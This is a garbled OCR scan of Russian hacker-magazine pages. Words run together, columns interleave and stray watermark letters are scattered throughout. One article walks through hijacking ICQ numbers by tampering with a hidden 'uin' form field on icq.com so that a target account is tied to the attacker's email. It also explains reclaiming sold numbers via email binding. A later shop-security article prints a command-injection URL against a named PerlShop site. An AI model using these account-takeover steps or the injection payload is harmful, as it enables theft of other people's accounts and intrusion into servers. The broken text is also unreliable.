 

 

 

m

w Click

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

o

 

 

.

 

 

 

 

.c

 

 

 

p

 

 

 

g

 

 

 

 

 

df

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

IPD SE

Заотдельнуюплатуя дамномерадмина=). Как этож надобылопросить,чтобондал пятизнакxy.

my fans;39666;Fallen Angel;0 my fans;661186;o2 Goodiez;0

Админы столь популярны, что у них есть фанаты! И больше всего порадовала группа эта группа:

hackers;102030404;NukedX's Bot;0

hackers;799499;NukedX's Bot;0

Иногда работникам влом лезть в БД ICQ, и они поверяют примаки номеров по боту S3TUP'а.

2.Могут, но чаще всего хорошенькие номера не долго задерживаются в чужих руках.

3.Реально, и случается это довольно часто. Но бывает и наоборот.

По этому списку можно сверять свои пятерки: админские они или нет. И, например, если пятизнак подходит под группу Ex-ICQ, то есть человек уже не работает на Мирабилис, то много шансов, что этот номерок осядет у тебя надолго. Но крайне не советую стучать в эти номерки и чего-либо просить — минимум отделаешься игнором ;).

Привязываем 10001 =)

Как привязатьпятизнакк мылу?

До недавнего времени считалось, что у пятизнаков не может быть праймари-мейла и восстановить пароль от пятизнака невозможно. Однако теперь это стало возможно при помощи локализованных версий аськи, таких как, например, Rambler-ICQ (версий много, но используем русскую — роднее =)).

Итак,расскажувсепопорядку.Для началаидем наофициальнуюстраничкуhttp://icq.rambler.ru, гделицезреемскринс красивымномером10110(думаю,врядлиону нихесть;)),а справаот неговидимпредложениескачатьRambler-ICQ, чтомыи делаем.Скачави установивпрограмму,смелозапускаеми видимпредложение ввестиномерICQи пароль,логинимсясосвоим пятизнаком,которыйжелаемпривязатьк мылу. Открываетсяокошкорегистрации,в которомнам предлагаютлибоввестисвойлогиннаРамблере,еслитакойимеется,либозарегистрировать новый.В целяхбезопасностия всежерекомендуюзарегистрироватьновыйящик,которыйникомунебудетизвестен,таккакименноонбудет привязанк нашемупятизнаку.На следующем этапенампредлагаютввестипарольи секретныйвопросс ответомнанего,парольнанашем

пятизнакеизменитсянапассотмыла.

Такчтовводимлибосвойдействующийпароль, либочто-тоболееизощренное,чем«qwerty»;). Послеэтого,наконец,логинимсяв номер, бережнозаписавпередэтимадреспривязанногомылав блокнотик.Все,наэтомпроцедура привязкизавершена.Чтобывосстановить парольотсвоегопятизнака,идемнастраничку http://id.rambler.ru/script/reminder.cgi,вводим логинсвоейпочтынаРамблере,которую привязалик пятизнаку,послечегоотвечаемна свойсекретныйвопроси устанавливаемновый пароль.Парольнанашемпятизнаке,соответственно,тожеменяется.

Эта система применяется не только к пятизнакам. Также, вследствие этой фичи, появилось много риперов, которые, продавая пятизнаки за копейки, с помощью этого метода возвращали их обратно. Поэтому хочу рассказать, как узнать, привязан ли номер ICQ. Для этого достаточно глянуть инфу номера в клиенте QIP (www.qip.ru) на вкладке «Дополнительно» окошка «Информация». Там мы можем увидеть такую же запись, как на скриншоте «Привязанный номер».

Это значит, что номер привязан. Логично ;). Если номер присобачен, например, к nana.co.il,

xàêåð 02 /98/ 07

/ 085

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

w Click

to BUY

 

>> взлом

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Сравнительная таблица

то отвязать первичный e-mail можно, пере-

(Товарищ! Перед тем как нажать «Enter», поду-

URL из письма, увидеть сможешь только ты.

привязав его к другому мылу того же nana.co.il.

май, какой могущественной силой обладает эта

Здесь описана только одна сторона нового бага,

И соответственно,РамблеррежетсяРамблером.

кнопка).

и во избежание повального угона номеров (при-

 

Вторым шагом будет сохранение странички

вет, баг на BIGFOOT.COM) я не стану говорить

Html-инъекциянастраницахicq.com

к себе на винчестер. Для этого выбери в меню

о том, как полностью взять контроль над конк-

Как и многие программы мгновенных сообще-

браузера «File Save As» и сохрани страничку

ретным номером и какие номера были захва-

ний, интернет-клиент ICQ не лишен своих раз-

локально.

чены в результате проведения экспериментов.

личных недочетов и уязвимостей. Сейчас я по-

Действие третье, как уже упоминалось выше,

На сегодняшний день найденная уязвимость

ведаю тебе о свеженьком баге в WHITEPAGES

— это простая подмена понятий, а именно

уже отнесена к разряду критических, так как

ICQ, благодаря которому ты сможешь получить

необходимо отредактировать сохраненную

с ее помощью можно изрядно наломать дров.

практически любой понравившийся UIN.

страничку.

Поэтому было принято решение немедленно

Итак, толчком для исследований стала нашу-

Итак, открываем HTML-код сохраненной

осведомить работников компании Mirabilis,

мевшая новость автора популярного альтерна-

паги в блокноте (правый клик мыши по файлу

которые, в свою очередь, «оперативно» фиксят

тивного интернет-пейджера QIP (qip.ru).

— «Открыть с помощью Notepad»). Далее

HTML-код своих web-ресурсов. Но, как всегда,

Inf сообщил о том, что его UIN каким-то образом

при помощи поиска («Ctr+H», «Найти и заме-

не до конца… =)z

привязали к локализованному e-mail без его

нить») находим тот номер ICQ, c которым мы

 

ведома. В связи с этим Inf'ом досрочно была

прилогинились, то есть ищем строку «<input

Номерок админа

выпущена новая альфа-версия ICQ-клиента

type="hidden» id="uin» name="uin» value="наш

 

QIP, с помощью которой стало возможно узнать,

уин, с которым мы сделали удачный логин">».

 

к какому конкретно локализованному e-mail-

В этой строке меняем наш UIN на UIN, который

 

адресу привязан или не привязан твой элитный

хотим заполучить, и сохраняем весь этот

 

номерок. Эта новость заинтересовала гуру ICQ-

HTML-фарш. Также нам придется найти и по-

 

хакинга с ником ТурисТ — Алексея Шакирова,

менить строки «email_attach_step2.php» на

 

и он вспомнил о том, что зимой этого года, копа-

«https://www.icq.com/register/email_attach_

 

ясь в HTML-кодах web-ресурсов icq.com, он на-

step2.php». Делается это для снятия локаль-

 

шел интересные строки: «<input type="hidden»

ности нашего нового HTML-кода. Сделано?

 

id="uin» name="uin» value="target uin"» — и пы-

Теперь браузер будет видеть страницу не как

 

тался при помощи банальной подмены номера

локальную =).

 

получить на свой e-mail его пароль. В итоге,

«И в чем тут замес?» — спросишь ты. Так вот

 

докопаться до истины оказалось легко, а позже

теперь необходимо сделать самое главное.

 

он поделился ею со мной. Суть бага, к великому

Открываем страничку с новым кодом. В поле

 

сожалению, оказалась примитивной.

«Пароль» вписываем пароль от старого UIN,

 

Итак, опишу пошагово действия, которые нас

с которым мы совершили удачный логин. Впи-

 

интересуют.

сываем в поле «E-mail» наш или свежезаре-

 

Во-первых,необходимодатьпонятьсерверу,что

гистрированный e-mail-адрес. Жамкаем пимпу

 

ты—друг,и нашимпервымшагомстанетудачный

«SUBMIT».

 

логиннастраничкеwww.ICQ.com.Для этоготебе

Теперь все просто и понятно — на наш почтовый

 

потребуютсялюбойUINи правильныйпарольот

адрес падает письмо с конфирм-кодом от ICQ

 

него.Конкретнее,нужнозайтинаhttps://www.ICQ.com

team, в котором будет написано, что-то вроде

 

/register/email_attach.phpи сделатьудачный

этого: «Привет! Твой номерок 54321. Желаешь

 

логин.Далеевбейв адреснуюстрокубраузера

подтвердить регистрацию e-mail attachmend?

 

«https://www.ICQ.com/register/email_attach_

Тогда нажми на URL из нашего письма».

 

step2.php»и жми«Enter».

А вот что произойдет после того, как ты нажмешь

 

/ 086

xàêåð 02 /98/ 07

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

i

 

 

F

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

t

 

 

 

 

 

 

 

 

 

t

 

P

D

 

 

 

 

 

 

 

 

o

P

D

 

 

 

 

 

 

 

 

o

 

 

 

 

NOW!

r

 

 

 

 

NOW!

r

 

 

 

 

 

BUY

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

m

w Click

 

 

 

 

 

 

o

w Click

 

 

 

 

 

 

o

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

df

 

 

 

 

e

 

 

 

p

df

 

 

 

 

e

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

E

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

to BUY

 

>> взлом

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

Леонид «R0id» Стройков

/  r0id@mail.ru  /

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Жесткийантифрод

Защити свой интернет-шоп

В своих предыдущих статьях я уже несколько раз упоминал о темной стороне сетевого бизнеса. Увы, но таковы реалии наших дней. Кто то, обороняясь, создает новые средства защиты, а кто то стремится их преодолеть. Сетевая гонка вооружений — обыденное явление для хакеров и специалистов по информационной безопасности. Но вот дилемма: какую сторону выбрать? Остаться за баррикадами обороняющихся или принять позицию атакующих? На этот вопрос, пожалуй, никто не даст однозначного ответа. Важно понять одно — ломать не строя невозможно. Поэтому в этой статье мы примем противоположную привычной нам сторону — строну защиты. Я расскажу, как лучше защитить собственный интернет-магазин и уберечь от атакующей стороны своих клиентов.

Угрозавзлома

карт клиентов начнут пропадать денежные

можетиметьнегативныепоследствия.В порядке

Допустим, ты решил открыть свой собственный

средства в весьма приличных объемах? Такой

альтернативы,можнонеиспользоватьбазудля

интернет-шоп, принимающий оплату по кре-

ситуации нельзя допустить ни в коем случае.

храненияинформацииозаказах.

дитным картам. Почему именно по кредиткам?

Поэтому хранить данные о кредитках клиентов

Достаточно вспомнить известную торговую

Да потому что кредитка сейчас есть у каждого

в базе в незашифрованном виде категорически

тележку PerlShop. В этом движке вся информа-

второго человека, следовательно, количество

не рекомендуется! Есть несколько вариантов

ция о заказах хранится в каталогах customers

твоих потенциальных клиентов будет гораздо

решения проблемы:

и orders (плюс два вспомогательных каталога:

выше, нежели при оплате товаров в шопе при

1. шифровать данные и сохранять в базе на

temp_customers и temp_orders). Кстати, именно

помощи WebMoney. Пусть, к примеру, в твоем

сервере;

в этой торговой тележке был найден баг, поз-

интернет-магазе будут продаваться ноуты, каме-

2. удалять информацию о выполненных заказах

воляющий выполнять произвольные команды

ры, мобильники и прочие дорогие технические

с сервера, на котором стоит шоп;

на сервере. Нетрудно догадаться, что файлы,

девайсы, а доставка осуществляется как в стра-

3. использовать отдельный сервер под БД,

содержащие данные о заказах и доступные

ны СНГ, так и в Западную Европу и США. То есть,

хранящий бэкапы заказов и физически не свя-

на чтение, быстренько отправлялись в виде

как ты понимаешь, создаваемый магазин сулит

занный с сервером интернет-магазина.

бэкапа на винчестер «доброжелателям». Если

достаточно крупный ежемесячный денежный

Первыйспособменеегеморройный,нежели

тебе интересно, как это все осуществлялось, то

оборот, требующий постоянного контроля.

остальные,ноонимеетнескольконедостатков.

можешь пройтись по линку одного из бажных

Но речь сейчас не о продажах, а о защите этих

Во-первых,нуженкриптоустойчивыйалгоритм.

онлайн-шопов на движке PerlShop (шоп давно

продаж.

Обычноинтернет-шопыиспользуютпростоMySQL-

заброшен, так что никакого вреда кардхолдерам

Раз уж твой шоп принимает к оплате кредит-

шифрование,хэшикоторогосбрутитьнесостав-

ты даже при желании не нанесешь ):

ные карты, то первое, на что следует обратить

ляетособоготруда.Иногдавстречаютсяболее

 

внимание, — это хранение данных о кредитках

мудреныеалгоритмы(ясталкивалсясуникальными,

http://shadow.cyberpooch.com / cgi-

твоих клиентов. Представляешь, как упадет

разработаннымиспециальноподконкретныйшоп),

bin / perlshop.cgi?ACTION=thispage&t

репутация твоего магазина, если с кредитных

хранящиесвоиключиопять жевMySQL-базе,что

hispage=| ls;&ORDER_ID=530609289

 

 

 

 / 088

xàêåð 02  / 98 / 07

 

Соседние файлы в папке журнал хакер